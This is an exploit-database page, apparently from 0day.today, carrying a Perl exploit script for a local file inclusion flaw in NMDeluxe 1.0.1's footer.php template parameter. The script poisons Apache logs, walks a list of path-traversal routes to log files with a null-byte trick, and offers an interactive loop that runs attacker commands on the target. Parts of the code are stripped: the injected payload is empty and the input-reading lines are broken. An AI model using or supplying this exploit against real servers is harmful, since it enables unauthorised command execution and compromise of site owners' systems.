[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit

Author
BeyazKurt
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1760
Category
web applications
Date add
14-04-2007
Platform
unsorted
=================================================================
NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit
=================================================================



# Perl
#
# NMDeluxe 1.0.1 (template) Local File Inclusion Exploit
#
# D0rk     : "powered by NMDeluxe" dorka gerenk yok ama nese :p
#
# Dun trojen yedim a.q ! baska turlu yapamaz zate lamerler
#
# Download : http://wsdeluxe.com/nmdeluxe/downloads.html Your Name & Site URL :p
#
#

use IO::Socket;
use LWP::Simple;
#ripped
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3) {
print "
NMDeluxe 1.0.1 (template) Local File Inclusion Exploit
###############################################################
Kullan.m : beyazkurt.pl [victim] [apachepath]
###############################################################
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "Code is injecting in logfiles...\n";
$CODE="";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
print "[shell] ";$cmd = ;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
PeerPort=>"80") or die "Connection failed.\n\n";
#now include parameter
print $socket "GET
".$path."/includes/footer.php?template=".$apache[$apachepath]."%00&cmd=$cmd
HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = ;



#  0day.today [2024-12-24]  #